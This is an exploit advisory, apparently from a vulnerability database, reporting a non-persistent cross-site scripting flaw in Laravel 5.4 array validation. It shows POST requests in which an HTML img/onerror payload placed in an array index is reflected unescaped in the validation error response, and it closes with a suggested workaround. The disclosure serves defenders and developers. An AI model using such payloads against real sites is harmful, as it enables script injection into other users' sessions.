Laravel 5.4 Cross Site Scripting

Credit: MaHDyfo
Risk: Low
Local: No
Remote: Yes

# Exploit Title: Laravel non-presistent XSS in validation of arrays # Date: 06/03/2017 # Exploit Author: MaHDyfo (mahdyfof[the at sign] # Vendor Homepage: # Version: 5.4 In Laravel validation rules, assume that you set a rule to get an array input. $this->validate($request, [ 'lessons' => 'required|array', 'lessons.*' => 'numeric' ]); Here we say lessons should be array and the elements should be numeric. Now let's enter a character there to fail the validation. POST Request: lessons[]=1&lessons[]=4&lessons[]=abc It tells {"lessons.2":["The lessons.2 must be a number."]} That's OK up to here. But what if we place an index for the array. POST Request: lessons[]=1&lessons[]=4&lessons[example]=abc Response: {"lessons.example":["The lessons.example must be a number."]} POST Request: lessons[]=1&lessons[]=4&lessons[<img src=x onerror='alert(1)'>]=abc Response: {"lessons.<img src=x onerror='alert(1)'>":["The lessons.<img src=x onerror='alert(1)'> must be a number."]} And it executes the alert with no problem... You can see this bug already exists in Laravel official doc: Maybe the solution is to validate the array values yourself by for example extending validation rules. Regards, MaHDyfo Iran

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018,


Back to Top